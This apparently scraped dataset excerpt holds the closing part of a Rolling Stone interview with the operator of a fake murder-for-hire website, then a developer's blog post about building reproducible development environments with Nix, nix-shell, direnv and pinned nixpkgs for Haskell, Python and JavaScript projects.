**I’m confident that what I’m doing is saving lives. The interviews and the news media that have gotten involved in this and aired stories, it’s not slowing down the number of solicitations that are received. The fact is that people are online, and they’re going to search on how to hire a hit man, and they’re ending up on the Web site. The internet is not a safe place. We know that. But I’m just one person trying to make it a little better for everybody.
**Are you worried about violence or retaliation?
**Not terribly, no. There’s danger in everything that people do every day. My personal safety I’m not too worried about. There’s a lot of dangerous people out there. I have to be cognizant of that. But this has become my personal mission. To save other people’s lives, who may never even know that they were in danger. And if I have to be the face of the Web site to get it out there and to help people, I have no problem doing that.
**Why do you think people still contact you, given how much coverage there has been of this? It's very easy to Google this and see it's a joke.
**Not everybody watches the news, reads the news. Not everybody listens to a podcast about this. I think some people, they get online [and search] “how to hire a hit man,” or “how to contact a hit man,” they see that first webpage. They see it’s HIPPA-compliant and they they feel compelled to leave their real information. It is beyond me why people do that, but they do. I don’t want to say it’s human nature, but these people are just not educated enough to know the difference, I guess.
**What has it taught you about human nature?
**I look at things a little bit differently than some, I guess, after these experiences. I don’t know what’s traveling through somebody’s head when they send an e-mail. I don’t know if they’re in deep despair. I don’t know if they’re looking for assisted suicide, I don’t know if they want their ex-husband or wife taken out, I don’t know what the situation is. I have to take every precaution and look at these e-mails and make sure I’m asking the right questions and researching this properly. There’s a lot of mental illness that’s out there. A lot of it shows up in my email. Let’s put it that way. A lot of it shows up from people seeking to cause harm to others. Everybody’s got their own story going on inside their head. And unfortunately, my website is like a magnet for those that are just hell bent on causing harm to others. | true | true | true | A dozen people have been arrested after reaching out to "Guido Fanelli," the fake proprietor of fake murder-for-hire site Rent a Hitman. | 2024-10-12 00:00:00 | 2020-10-15 00:00:00 | article | rollingstone.com | Rolling Stone | null | null |
|
22,167,546 | https://myme.no/posts/2020-01-26-nixos-for-development.html | NixOS: For developers | null | # NixOS: For developers
After my brief introduction to `NixOS` and the process of installing it, I thought I'd dive into my experience with development on `NixOS`. I failed my initial intention to come with a follow-up post in quick succession to the introduction, but this one dragged on for several reasons. Finding structure and trying to be concise when discussing something as “generic” as `Nix` turned out to be quite challenging. Also, while still learning I found many of the things I'd written in the past to be obsolete the next time I returned to writing.
## Again, why `Nix`?
One of the main selling points of `Nix`
and `NixOS`
is its focus on
deterministic and reproducible builds, something all developers should strive
for in their projects. Many build and packaging tools have been putting
considerable effort into maintaining integrity, but normally this is localized
to libraries and dependencies in a single language1. It is still common for
programming languages to depend on system-wide compilers, interpreters and
shared libraries by default. No tool2 has pioneered and gone to the lengths
`Nix`
has to ensure reproducible builds, where not just the project’s direct
dependencies are locked, but practically *every* external dependency up to and
including the global system3.
`Nix`
does not do away with the build tools you would use for building and
deploying a project. Instead, it formalizes and encapsulates these tools in a
way that they too are locked to a given version. `Nix`-compatible projects are
still built using the regular tools for that project’s ecosystem, however the
versions of these tools will be deterministic.
## Arrested development
`Nix`
as a language is quite minimalistic, yet built on sound functional
programming concepts. The result is a language which shines when creating
reusable functions, which again allows it to express build recipes (derivations)
for a wide variety of projects. `Nix`
does not directly *compete* with existing
build tools, but tries to *complement* and *combine* them. While the “core” of
the `Nix`
ecosystem may be small, the community has accumulated many conventions
and utilities with the aim to reduce duplication and boilerplate. This effort is
mainly contained within the nixpkgs package collection. And while the modularity
and reusability are impressive, the information overload when dealing with
`nixpkgs`
leads to a steep learning curve for newcomers.
I was of course expecting a learning curve when diving head first into `NixOS`, but I must admit there were several times when I questioned my decision to switch. Learning curves imply a drop in productivity as you spend time learning, when you instead could have been producing. It is not easy to value ongoing efforts like these which have yet to produce measurable results. I was steadily learning more about `Nix`, yet I felt a growing desperation and despair because despite my efforts, I had very little to show for it. Progress was slow.
In retrospect the goals I had to reach seem more well-defined than they were up front:
- Create project environments free of system dependencies.
- Change my development workflow to accommodate new restrictions and requirements.
- Manage my *own* software using `Nix`.
But to begin with I was a bit stuck in `NixOS`, enjoying all the great software
built and maintained by others, yet having quite a bit of trouble getting
anywhere with my own projects.
## Turtles all the way down
While learning `Nix`
I’ve had many *aha* moments. One was when I finally
realized that `Nix`
isn’t a package manager in the normal sense used for
distributing binary builds. The fact that it can fetch pre-built derivations is
merely a consequence of its design. Primarily it is a *source distribution and
build* tool. I gradually grokked this as I got further involved with writing nix
expressions. Documentation might already state it clearly, but here I’m talking
about reaching enlightenment at a deeper level. Perhaps similar to being told
something as a kid, but still having to *experience* it first hand in order to
“get it”.
The `Nix`
expression for a derivation (a build unit) must state all of its
dependencies in order to build. This first and foremost includes its *build*
dependencies, but also its runtime dependencies. And here’s where it gets weird.
These dependencies are themselves merely other `Nix`
expressions for other
derivations. More concretely, if project *A* uses tool *B* in its build process,
it's obvious that *B* must be built before attempting to build *A*. In most
environments I've encountered this typically means to use “some package manager”™
to go fetch *B*, typically not caring how it is built or distributed. In `Nix`
though, the dependency *A* has on *B* is declared by simply referring to the
recipe for building *B*. This means `Nix`
will simply go ahead and build *B* in
order to build *A*. And the same goes for all of the dependencies *B* might have
on other tools, even up to the `C`
library and compiler.
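As a contrived sketch of this (the project names and paths are made up for illustration), the dependency of *A* on *B* is nothing more than a reference to *B*'s derivation:

```
with import <nixpkgs> {};

let
  # "B": some tool A needs at build time
  projectB = stdenv.mkDerivation {
    name = "project-b";
    src = ./b;
  };
in
# "A": declaring the dependency is just referring to B's expression.
# Nix will build (or substitute from a cache) B before building A.
stdenv.mkDerivation {
  name = "project-a";
  src = ./a;
  buildInputs = [ projectB ];
}
```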
Nobody wants to waste precious CPU cycles (and time) on rebuilding the “whole
world” whenever we wish to build a project, which is why most build tools
implement caching in one way or another. By tracking all inputs to every
derivation, `Nix`
is able to implement a content-addressable cache which is
queried for pre-built derivations. This cache is also distributed, allowing
content to be fetched from trusted sources, primarily the `NixOS`
cache at
cache.nixos.org. It is populated by build servers, ensuring that the most
common/popular derivations are always up to date. Locally this doubles as the
`Nix`
store, in which all the artifacts built and *used* in the current system
or user profile reside.
In the end it’s the sole fact that by having deterministic builds and knowing
all the inputs involved, it’s possible to determine up-front which identifier
such an artifact will have in the `Nix`
store. And if it’s already there,
there’s no point in building it again. Et voilà, you get binary package
distribution for “free”!4 However, if a dependency is neither in the local
`Nix`
store, nor in one of the trusted binary caches, `Nix`
simply builds the
nested dependencies on demand. They’re just layers upon layers of `Nix`
expressions after all. Simply mind-bending!
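To see this in practice (using `hello` as an arbitrary example package, with store hashes and output abbreviated to placeholders): `nix-build` prints the deterministic output path, substituting it from the binary cache when possible, and `nix-store` can list its entire runtime closure:

```
❯ nix-build '<nixpkgs>' -A hello --no-out-link
/nix/store/<hash>-hello-2.10
❯ nix-store --query --requisites /nix/store/<hash>-hello-2.10
/nix/store/<hash>-glibc-2.27
/nix/store/<hash>-hello-2.10
```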
## System integration
### Virtual environments using `nix-shell`
`Nix`
provides packages for many compilers, interpreters, libraries, and related
tools. Through `Nix`
we get a uniform way of installing dependencies, as opposed
to using several domain-specific ones, each with their own unique behavior.
`Nix` also comes with `nix-shell`, which starts an interactive shell based on a `Nix` expression, analogous to the way `virtualenv` works in `Python`. It either
builds or fetches cached builds of dependencies and adds them to the
`Nix`
store, before making them accessible in a subshell through modified
environment variables and symlinks. The user or system environment remains
untouched, which means projects can pick and choose developer tools at their
leisure, without polluting the user’s environment or requiring root-access.
Following is a short example of my system where neither `python3` nor `node` is found in my `$PATH`, then using `nix-shell` to create an ad-hoc environment where the `Python 3.7` and `Node.js 10.x` interpreters are available:
```
❯ which python
python not found
~
❯ which node
node not found
~
❯ nix-shell -p python3 -p nodejs-10_x
[nix-shell:~]$ python --version
Python 3.7.3
[nix-shell:~]$ node --version
v10.15.3
```
`Nix`
will download pre-built binaries of `Python`
and `Node.js`
on the first
run, then cache them in the `Nix`
store until garbage collected. The `-p <package>`
flag to `nix-shell`
is really convenient when you want to quickly try
something out, but for proper projects you’d want something more persistent and
declarative. Without the `-p`
flag `nix-shell`
will look for and evaluate `Nix`
expressions from files named `shell.nix`
, or fall back to `default.nix`
.
Invoking `nix-shell`
in the same directory then loads the environment in a
subshell:
```
~/project $ nix-shell
[nix-shell:~/project]$ node --version
v10.15.3
[nix-shell:~/project]$ python --version
Python 3.7.3
[nix-shell:~/project]$
```
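The post doesn't include the `shell.nix` behind that session, but a minimal version providing the same interpreters could look something like this (a sketch using `mkShell`):
```
with import <nixpkgs> {};
mkShell {
  buildInputs = [
    python3       # Python 3.7.x in the nixpkgs snapshot used here
    nodejs-10_x   # Node.js 10.x
  ];
}
```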
We can also instruct `Nix`
to include `Python`
packages in our environment:
```
with import <nixpkgs> {};
mkShell {
  buildInputs = [
    (python3.withPackages (ps: with ps; [ requests ]))
  ];
}
```
Where invoking `nix-shell`
gives us:
```
[nix-shell:~/tmp]$ python
Python 3.7.3 (default, Mar 25 2019, 20:59:09)
[GCC 7.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import requests
>>> requests
<module 'requests' from
'/nix/store/j70h9pxi8sn1sq0cy65k5y3knhrmyqb7-python3-3.7.3-env/lib/python3.7/site-packages/requests/__init__.py'>
```
`nixpkgs`
provides definitions for a large set of `Python`
packages. However, if
a package is not available it’s fully possible to pull it down using `pip`
. In
order to use `pip`
from within the environment it has to be added as a
`buildInput`
like any other. Furthermore, `pip install`
must either be invoked
with the `--user`
option to install dependencies under `~/.local/lib`
, or even
better using a `virtualenv`
. There are also ways of instructing `Nix`
about how
to fetch packages from package archives like pypi, typically through utilities
available in `nixpkgs`
or using external tools called `generators`
.
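A rough sketch of that `pip`-inside-`nix-shell` arrangement (assumptions of mine: `pip` and `virtualenv` come from `nixpkgs`, and the virtualenv lives in `./venv`):
```
with import <nixpkgs> {};
mkShell {
  buildInputs = [
    (python3.withPackages (ps: with ps; [ pip virtualenv ]))
  ];
  # Keep pip-installed packages in a project-local virtualenv instead of the
  # user environment.
  shellHook = ''
    [ -d venv ] || virtualenv venv
    source venv/bin/activate
  '';
}
```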
### Automatic environment activation using `direnv`
If you, like me, jump around a lot between projects and environments, the
inconvenience of having to invoke `nix-shell`
all the time quickly becomes
apparent. To automate this I rely on a tool called direnv, a companion for your
shell:
> direnv is an extension for your shell. It augments existing shells with a new feature that can load and unload environment variables depending on the current directory.
Personally I integrate it with `zsh`
, which means that whenever I `cd`
into a
project directory tree, `direnv`
will ensure that the shell is set up with the
same environment I would get by invoking `nix-shell`
directly. Unlike `nix-shell`, however, `direnv`
does not invoke a new sub-shell for the new
environment, but mutates the current process's environment. This provides a
seamless experience navigating between different projects, not having to worry
about loading the correct `virtualenvs`
or switching between interpreter
versions using tools like `nvm`
or `pyenv`
:
```
~
❯ for prg in cabal ghc hlint; do which "$prg"; done
cabal not found
ghc not found
hlint not found
~
❯ cd ~/projects/nixon
direnv: loading .envrc
direnv: using nix
direnv: using cached derivation
direnv: eval .direnv/cache-.1926.5d6da42cf79
direnv: export +AR +AR_FOR_TARGET ... ~PATH
nixon on master [$!?]
❯ for prg in cabal ghc hlint; do which "$prg"; done
/nix/store/h433cxh423lrm3d3hb960l056xpdagkh-cabal-install-2.4.1.0/bin/cabal
/nix/store/zj821y9lddvn8wkh1wwk6c3j5z6hpjhh-ghc-8.6.5-with-packages/bin/ghc
/nix/store/1pwskgibynsvr5fjqbvkdbw616baw8c4-hlint-2.2.2/bin/hlint
```
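The `zsh` integration itself is just the standard `direnv` hook — one line in `~/.zshrc` (nothing specific to `Nix`):
```
# Load and unload direnv-managed environments on every directory change.
eval "$(direnv hook zsh)"
```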
For `direnv`
to know when and how to load an environment, it checks for the
existence of `.envrc`
files. These files are basic shell scripts evaluated using
`bash`
and should output expressions for setting environment variables. In the
case of `Nix`
I typically just invoke `use_nix`
in these files. The first time
an `.envrc`
file is found (and on changes) `direnv`
will ask for permission to
evaluate its content. This is a security mechanism in order to avoid
accidentally invoking malicious code. Once allowed, `direnv`
will continue to
load and unload the environment when entering and leaving project directory
trees.
```
~/tmp/project
❯ echo 'use_nix' > .envrc
direnv: error .envrc is blocked. Run `direnv allow` to approve its content.
~/tmp/project
❯ direnv allow
direnv: loading .envrc
error: getting status of '/home/mmyrseth/tmp/project/default.nix': No such file or directory
direnv: eval .direnv/cache-.1926.5d6da42cf79
direnv: export ~PATH
```
### The single `Emacs`
process conundrum
Back in my `vim`
days I’d typically launch the editor from within a `virtualenv`
in a shell, or at least starting in a project directory. Typically I’d have a
`tmux`
session for each project, a single `vim`
for that project in one pane,
and potentially several shells in other panes. When switching to `Emacs`
I
quickly got used to using projectile for switching between projects in
combination with perspective to provide workspaces for each project. This keeps
buffer lists and window layouts tidy and organized while working on multiple
projects in a single `Emacs`
process.
`Emacs`
uses a single variable for the execution path (`exec-path`
) and other
similar globals defining environmental values, which ultimately affect how
`Emacs`
will spawn external commands like compilers, linters, repls, and so on.
Naturally `Emacs`
won’t be able to launch these tools if they aren’t in the
`$PATH`
, and so these globals have to change when switching between projects.
This can be done manually by invoking commands, or automatically by hooks
triggered when switching between buffers. I was already using plugins like
pyvenv to switch between `virtualenvs`
in `Python`
projects. Most `node`
-related
plugins already support finding tools in `npm bin`
.
I started off looking for solutions which would allow me to keep my “single
process `Emacs`
”-based workflow. There are `direnv`
plugins for Emacs which load the project environment on file/buffer changes in
`Emacs`. Unfortunately, after using `emacs-direnv` for a while I came to realize
it wasn't the solution I wanted. The main issue with the `direnv` plugin for
`Emacs` is that environments are loaded automatically. While this is typically
what you want, I found that when switching between buffers, `Emacs` would keep
re-evaluating and updating the
environment. In the end this caused the editor to feel slow and unresponsive. A
deal-breaker!
Biting the bullet, I moved on to a workflow centered around having one `Emacs`
instance per project I was currently working on. I dropped my single long-lived
`Emacs`
sessions in favor of multiple sessions, each running within the project
environment set up by `nix-shell`
. It ended up with me firing up and shutting
down `Emacs`
much more often than before, as well as having to find the correct
editor instance for a certain project. This quickly started to annoy me in the
same way using a slow `direnv`
did. If only I could make the first approach
faster…
Turns out I wasn’t the only one looking for this and I eventually stumbled on an implementation of the `use_nix`
function used by `direnv`
. This provided a
significant performance increase by *caching* the result of evaluating
`nix-shell`
. Another benefit of this function is that it also symlinks the
environment derivation into `Nix`
’s `gcroots`
. Don’t worry, this basically means
that the artifacts required by the development environment won’t be garbage
collected when cleaning out the `Nix`
store using `nix-collect-garbage`
.
Even more time passed, and I became aware of a new tool built by Target, called
lorri. It is basically a daemon you can run in the background, building all your
environments as their expressions or dependencies change, while also ensuring
they are not garbage collected. I have yet to start using `lorri`
myself mostly
out of laziness, but I must say it looks very promising.
## Defining development environments
### Installing my own tools
In `Nix`
it’s important to distinguish between software intended to be used as a
dependency, like libraries, compilers, and so on, and *end-user* software, which
can be command line tools and GUI applications. While libraries and developer
tools should only be available from within any given project depending on them,
end-user software should be accessible from a user environment. I do develop a
few end-user tools that make my life easier, and so I had to figure out how to
best install these projects into my user profile.
Both `stack`
and `npm`
, and many other package managers5, are able to
install software into a “global” location. The `stack install`
and `npm install --global`
commands allow installing not just upstream packages, but also locally
from the same machine. Even though this was the way I installed my own software
on other operating systems, it was not the way I liked to do it on `NixOS`
. In
my opinion it’s a smell when you have to invoke several different tools to not
only install software, but also figure out what you’ve already installed. Some
tools do not even *track* what they installed, forcing you to manually go
through and remove stuff from your `~/.local`
.
`Nix`
resolves these issues in one go, at the cost of having to figure out *how*
to create *proper* `Nix`
expressions for `Python`
, `JavaScript`
, and `Haskell`
code bases. Luckily, `nixpkgs`
has us covered, normally providing a single
function doing what you want. Some `nixpkgs`
functions also wrap `Nix`
generators like `callCabal2nix`
, saving you from having to run these tools
yourself. It took me a while to figure out it was `callCabal2nix`
and
`buildPythonApplication`
I wanted for most `Haskell`
and `Python`
projects,
respectively. I have yet to make an attempt at installing any of my `JavaScript`
tools on `NixOS`
.
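For the `Python` side, a `buildPythonApplication`-based `default.nix` can be as small as the following sketch (placeholder name and dependencies — not one of my actual tools):
```
{ pkgs ? import <nixpkgs> {} }:

pkgs.python3Packages.buildPythonApplication {
  pname = "my-tool";      # placeholder
  version = "0.1.0";
  src = ./.;              # assumes a setup.py in the project root
  propagatedBuildInputs = with pkgs.python3Packages; [
    requests              # placeholder runtime dependency
  ];
}
```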
### A quick note on generators
I’ve mentioned that `Nix`
doesn’t stop you from using package managers like
`pip`
and `yarn`
from within a project environment. The downside is that `Nix`
has no knowledge of what these tools are doing, and so cannot ensure the same
guarantees as if it knew about the artifacts these tools create (or fetch). It
is possible to use these other tools to fetch or build the software we want,
*then* inform `Nix`
about the artifacts, which is then able to add these to the
`Nix`
store.
Since package managers normally operate based on existing dependency meta-data,
it’s possible to automate the process of listing out the dependencies,
performing the build steps for each, adding artifacts to the `Nix`
store, and so
on. Tools that automatically generate `Nix`
expressions from some input are
called *generators*. The output of these generators are `Nix`
expressions which
can then be saved to file and evaluated by `nix-build`
and `nix-shell`
. In the
case of `nixpkgs`
there are also wrapper functions around generators, which
save you from having to *use* the generators themselves. One example of this is
`callCabal2nix`
used for building `Haskell`
packages.
Here’s a list of a few assorted generators for different project types:
- node2nix: Generate `Nix` derivations to build `npm` packages.
- setup.nix: Generate `Nix` derivations for `Python` packages.
- cabal2nix: Generate `Nix` derivations from a `.cabal` file.
### Pinning `nixpkgs`
The package repository `nixpkgs`
is based on the concept of channels. Channels
are basically branches of development in the `git`
repository moving the
contained `Nix`
expressions forward by updating upstream versions, fixing bugs
and security issues, and providing new `Nix`
utilities. Channels are also moving
targets. System *users* want to automatically receive security updates, new
application versions, and so on. Software developers, on the other hand, want to
upgrade their dependencies in a controlled manner.
The `Nix`
way of locking down dependencies is to pin the `nixpkgs`
versions. In
essence this is to use a version of `nixpkgs`
from a specific commit, a
snapshot. This ensures that building the `Nix`
derivation will always result in
the same output, regardless of future upstream changes to `nixpkgs`
. Different
derivations may also use different versions of `nixpkgs`
without that
necessarily becoming an issue. To upgrade one or more dependencies it is often
enough to just change the snapshot of `nixpkgs`
to a newer version.
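In practice the pin often lives in a small `nixpkgs.nix` file that every other expression imports — the `default.nix` and `shell.nix` examples below do exactly that. A sketch, reusing the 19.09 snapshot that appears later in this post (any snapshot URL and `sha256` will do):
```
# nixpkgs.nix: a pinned snapshot of nixpkgs, used as `import ./nixpkgs.nix {}`.
import (fetchTarball {
  url = "https://github.com/NixOS/nixpkgs/archive/19.09.tar.gz";
  sha256 = "0mhqhq21y5vrr1f30qd2bvydv4bbbslvyzclhw0kdxmkgg3z4c92";
})
```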
### Haskell
`Haskell`
projects are typically built using `cabal`
. `stack`
is another popular
tool, which manages package sets of `GHC`
versions along with compatible
`Haskell`
packages. Gabriel Gonzales’ writeup of Nix and Haskell in production
state that `Nix`
is not a replacement for `cabal`
, but rather a `stack`
replacement.
`Nix`
has become quite popular in the `Haskell`
community and it seems many
people choose it to build their projects. In a way similar to Stackage,
`nixpkgs`
contains package sets built for different versions of `ghc`
6.
There’s a section in the `nixpkgs`
manual under “User’s Guide to the Haskell Infrastructure” providing some information on how to use `Nix`
for `Haskell`
.
I used `stack`
for all `Haskell`
development I’d been doing leading up to my
switch to `NixOS`
, and so it felt natural to continue using `stack`
under `Nix`
.
`stack`
even has native Nix support. However, since there’s quite a bit of
overlap in what `stack` and `Nix` attempt to solve, I've since switched my
workflow over to `Nix` and just `cabal`. `nixpkgs` provides a `callCabal2nix`
function which, in short, suffices to set up a simple project. Following are a few
hobby projects which I’ve recently switched over to this model:
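(As a reference point before those projects: in its most basic form the `callCabal2nix` route is a one-liner. A sketch with a placeholder project name, assuming the `.cabal` file sits in the project root.)
```
{ pkgs ? import ./nixpkgs.nix {} }:

# callCabal2nix runs cabal2nix on the .cabal file behind the scenes and builds
# the resulting derivation; the trailing set is for dependency overrides.
pkgs.haskellPackages.callCabal2nix "my-project" ./. { }
```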
#### nixon - `Nix`-aware project environment launcher
Using either rofi or fzf, `nixon`
selects projects from predefined directories
and launches `nix-shell`
(or other commands) in the project’s environment. This
is very useful when projects have `.nix`
files setting up shell environments in
which you want to spawn a terminal, an editor, run compilation commands, and so
on.
This project uses a single `default.nix`
file which also works by creating a
shell environment with additional developer tools when run in `nix-shell`
:
`default.nix`
:
```
{
  pkgs ? import ./nixpkgs.nix {},
  haskellPackages ? pkgs.haskellPackages,
}:
let
  gitignore = pkgs.nix-gitignore.gitignoreSourcePure [ ./.gitignore ];
in haskellPackages.mkDerivation {
  pname = "nixon";
  version = "0.1.0.0";
  src = (gitignore ./.);
  isLibrary = true;
  isExecutable = true;
  executableHaskellDepends = with haskellPackages; [
    aeson
    base
    bytestring
    containers
    directory
    foldl
    haskeline
    process
    text
    transformers
    turtle
    unix
    unordered-containers
    wordexp
  ];
  executableSystemDepends = with pkgs; [
    fzf
    rofi
  ];
  testDepends = with haskellPackages; [
    hspec
  ];
  license = pkgs.stdenv.lib.licenses.mit;
}
```
`shell.nix`
:
```
{
  pkgs ? import ./nixpkgs.nix {},
  haskellPackages ? pkgs.haskellPackages,
}:
let
  drv = (import ./default.nix) {
    inherit pkgs haskellPackages;
  };
in haskellPackages.shellFor {
  packages = _: [ drv ];
  buildInputs = (with pkgs; [
    cabal2nix
    cabal-install
    hlint
  ]) ++ (with haskellPackages; [
    ghcid
  ]);
}
```
In short, to define the derivation (`drv`
) I’m using the `Haskell`
specialization of `mkDerivation`
in `haskellPackages.mkDerivation`
. It also
makes use of `haskellPackages.shellFor`
to set up a shell environment used when
developing. This shell includes `cabal2nix`
, `cabal`
, `hlint`
, and `ghcid`
.
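Building and installing then uses plain `Nix` commands (standard behaviour, nothing project-specific):
```
$ nix-build          # builds default.nix and leaves a ./result symlink
$ nix-env -if .      # installs the same expression into the user profile
```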
#### i3ws - Automatic workspace management in i3.
This project is interesting because it was using `stack` in a monorepo-style layout before switching to `Nix`
. This meant that I had to find a nice way
to have several packages under development integrating nicely in `Nix`
. Luckily
somebody beat me to it, and I drew some inspiration from the “Nix + Haskell monorepo tutorial” post on the `NixOS`
`discourse`
, pointing to the
nix-haskell-monorepo `GitHub`
repo.
The new-style commands of `cabal`
support multiple projects using a
`cabal.project`
file. This file contains a listing of the
packages/subdirectories contained in the project, each with their own `.cabal`
file:
```
$ cat cabal.project
packages: foo
bar
baz
```
For a working example of this setup, see the GitHub repo7 for `i3ws`.
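On the `Nix` side, the gist of that monorepo approach is to expose each package through a `haskellPackages` override so the packages can depend on each other like any other `Haskell` dependency. A sketch (package names mirror the `cabal.project` above; see the linked repositories for the real thing):
```
{ pkgs ? import ./nixpkgs.nix {} }:

let
  haskellPackages = pkgs.haskellPackages.override {
    overrides = self: super: {
      foo = self.callCabal2nix "foo" ./foo { };
      bar = self.callCabal2nix "bar" ./bar { };
      baz = self.callCabal2nix "baz" ./baz { };
    };
  };
in {
  inherit (haskellPackages) foo bar baz;
}
```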
### Python
We use `Python`
extensively at work, and our most active codebase is a web
application with a `Python`
backend and a `JavaScript/TypeScript`
frontend.
It was this project I first tried to get working on my laptop after switching it
to `NixOS`
. We use some automation scripts which call out to `pip`
and `yarn`
to
install dependencies.
This is not a trivial project, but still I find the `shell.nix`
file I use to
setup the environment to not be very large. It is worth noting that we do not
build and deploy this project using `Nix`
, and so the expression is *only*
setting up enough for me to successfully run our install, testing and packaging
scripts:
```
{
  pkgs ? import (fetchTarball {
    url = "https://github.com/NixOS/nixpkgs/archive/19.09.tar.gz";
    sha256 = "0mhqhq21y5vrr1f30qd2bvydv4bbbslvyzclhw0kdxmkgg3z4c92";
  }) {},
}:
let
  # Pin Pillow to v6.0.0
  pillowOverride = ps: with ps; pillow.override {
    buildPythonPackage = attrs: buildPythonPackage (attrs // rec {
      pname = "Pillow";
      version = "6.0.0";
      src = fetchPypi {
        inherit pname version;
        sha256 = "809c0a2ce9032cbcd7b5313f71af4bdc5c8c771cb86eb7559afd954cab82ebb5";
      };
    });
  };
  # The Python environment is bound here so the shellHook below can refer to it.
  python = pkgs.python36.withPackages (ps: with ps; [
    (pillowOverride ps)
    pip
    python-language-server
    virtualenv
  ]);
  venv = "./venv";
in pkgs.mkShell {
  buildInputs = with pkgs; [
    binutils
    gcc
    gnumake
    libffi.dev
    libjpeg.dev
    libxslt.dev
    nodejs
    openssl.dev
    python
    squashfsTools
    sshpass
    yarn
    zip
    zlib.dev
  ];
  shellHook = ''
    # For using Python wheels
    export SOURCE_DATE_EPOCH="$(date +%s)"
    # https://github.com/NixOS/nixpkgs/issues/66366
    export PYTHONEXECUTABLE=${venv}/bin/python
    export PYTHONPATH=${python}/lib/python3.7/site-packages
    if [ -d ${venv} ]; then
      source ${venv}/bin/activate
    fi
  '';
}
```
First of all, none of the other developers on the team use `Nix`
8, which means I
have to add my `Nix`
configuration without being too intrusive on the others. I
also want to make sure I don’t deviate too much from the rest, leading to issues
caused by differences in my environment. We also have several scripts and
workflows centered around some of these tools, like automating dependency
installation across multiple sub-projects, package introspection, and `yarn workspace` symlinking, to name a few.
I could go on a digression as to how `NixOS`
breaks the Filesystem Hierarchy Standard of `Linux`
, but essentially it means that libraries and executables are
not found in standard locations. `Pillow`
uses some hardcoded paths in its
`setup.py`
which point to invalid locations on `NixOS`
. That makes it hard to
install it using `pip`
, and so it’s the only `Python`
dependency installed from
`nixpkgs`
. Overriding it pins it to the version we are using, which ensures
`pip`
is not going to try to install another version by itself. In the end this
works well, but I spent *a lot* of time trying to do this in several other ways.
In my quest to get `Pillow`
working nicely in our project I had to dive through
the `nixpkgs`
codebase, at which point I became more aware of all the helper
functions in that repository for building projects of different shapes and
sizes. What `buildPythonPackage`
does should be obvious from its name, but I
found that figuring out usage, differences, and even discovering all these
different utilities within `nixpkgs`
is not very easy. Much improvement could be
made in the `Nix`
community on this front.
### JavaScript & TypeScript
The `Node.js`
packages in `nixpkgs`
are mainly *end-user* packages. A few
`nodejs`
libraries are present because they are dependencies of non-NPM packages.
The `nixpkgs`
docs have a section on Node.js packages. The recommendation is to
use the `node2nix`
generator directly on a project's `package.json`
file, though several other generators for `Node.js`
packages exist as well.
For simpler setups I prefer to use `Nix`
to only provide `node`
, `npm`
, and
`yarn`
, then invoke these directly as it seems to work fine in most scenarios. I
haven’t had much reason for using `node2nix`
yet, so I can’t say much about that
experience.
One thing I typically do in my `JavaScript/TypeScript`
environments is to
include the `javascript-typescript-langserver`
package, which is used by
`lsp-mode`
in `Emacs`
to provide IDE-like tools.
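A typical `shell.nix` for such a project therefore stays small — just the toolchain plus the language server, with `npm`/`yarn` handling the actual `JavaScript` dependencies (a sketch; attribute names as found in the nixpkgs snapshot used elsewhere in this post):
```
with import <nixpkgs> {};
mkShell {
  buildInputs = [
    nodejs-10_x   # provides node and npm
    yarn
    nodePackages_10_x.javascript-typescript-langserver
  ];
}
```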
### Ad-hoc environments
Sometimes you want access to certain language tools in order to test something.
While on other systems you typically have `node`
or `python`
installed somewhere
directly accessible on the shell, in `NixOS`
this isn’t the case. Instead, by
adding a few expressions to the `nixpkgs`
configuration file it’s easy to launch
shells with access to these tools.
#### Using `nix-shell` to run scripts
`nix-shell`
also has support for being used in shebangs, making it ideal for
setting up ad-hoc environments used by simple scripts. The following example
instructs `nix-shell`
to create a `Haskell`
environment with `GHC`
along with the
turtle package pre-installed:
```
#! /usr/bin/env nix-shell
#! nix-shell -p "haskellPackages.ghcWithPackages (ps: with ps; [turtle])"
#! nix-shell -i runghc
{-# LANGUAGE OverloadedStrings #-}
import Turtle
main :: IO ()
main = do
  echo "Hello, World!"
```
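Marking the script executable then makes it self-contained — running it builds or fetches the environment on demand (file name is a placeholder):
```
$ chmod +x Script.hs
$ ./Script.hs
Hello, World!
```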
#### Pre-defined environments
Using `Nix`
overlays we can also define environments which can be referenced in
`nix-shell`
invocations to provide ad-hoc environments when testing out things.
Overlays are a way in `nixpkgs`
to define new packages and overrides to existing
packages. It’s a powerful concept, but here we’re using it just to create our
own derivations:
Node.js

Define `env-node` as an overlay in `~/.config/nixpkgs/overlays.nix`:

```
let
  overlay = self: super: {
    nodeEnv = with self; buildEnv {
      name = "env-node";
      paths = [
        nodejs-10_x
        nodePackages_10_x.javascript-typescript-langserver
        yarn
      ];
    };
  };
in [ overlay ]
```

Launching the environment:

```
$ nix-shell -p nodeEnv

[nix-shell:~]$ node --version
v10.15.3

[nix-shell:~]$ npm --version
6.4.1

[nix-shell:~]$ yarn --version
1.13.0

[nix-shell:~]$
```

Python

Similarly to `nodeEnv`, define an overlay in `~/.config/nixpkgs/overlays.nix`:

```
let
  overlay = self: super: {
    pythonEnv = with self; buildEnv {
      name = "env-python";
      paths = [
        (python3.withPackages (ps: with ps; [
          pip
          virtualenv
        ]))
      ];
    };
  };
in [ overlay ]
```

Launching the environment (here we're also adding `ipython` manually):

```
❯ nix-shell -p pythonEnv -p python3Packages.ipython

[nix-shell:~]$ python --version
Python 3.7.3

[nix-shell:~]$ ipython
Python 3.7.3 (default, Mar 25 2019, 20:59:09)
Type 'copyright', 'credits' or 'license' for more information
IPython 7.2.0 -- An enhanced Interactive Python. Type '?' for help.

In [1]:
```
## Summary
In hindsight I should have known attempting to write a post like this would be
opening a can of worms. Well, my setup and configurations *did* end up changing
in parallel with writing this post, and so time dragged on. Also, nailing the scope
of something as broad as this is not easy, and I feel I've only managed to scratch
the surface of describing development on `NixOS`
(or using just `Nix`
, the package
manager).
Development based around `Nix`
can be a very powerful thing indeed, but don’t
expect it to be a walk in the park. I see the lack of proper documentation and
poor discoverability as one of the main hurdles `Nix`
and `nixpkgs`
has to
overcome. Again, `nixpkgs`
is a *huge* collection of `Nix`
expressions for
applications, libraries, and tools ranging across many different programming
languages and ecosystems. I think because of both the size of the repository and
the diversity of its content, certain idioms have evolved *within*
different areas of the `nixpkgs`
repo. This makes finding the correct functions
and utilities to use for building a certain project harder for newcomers (and
perhaps even seasoned `Nix`
-ers).
Despite some of these areas of improvement I’m conviced that the concepts
pioneered by `Nix`
is here to stay. I have yet to find better alternatives for
managing the complexity of building and distributing software.
Finally I’d like to thank Bjørnar Snoksrud @snoksrud for proofreading.
## Footnotes
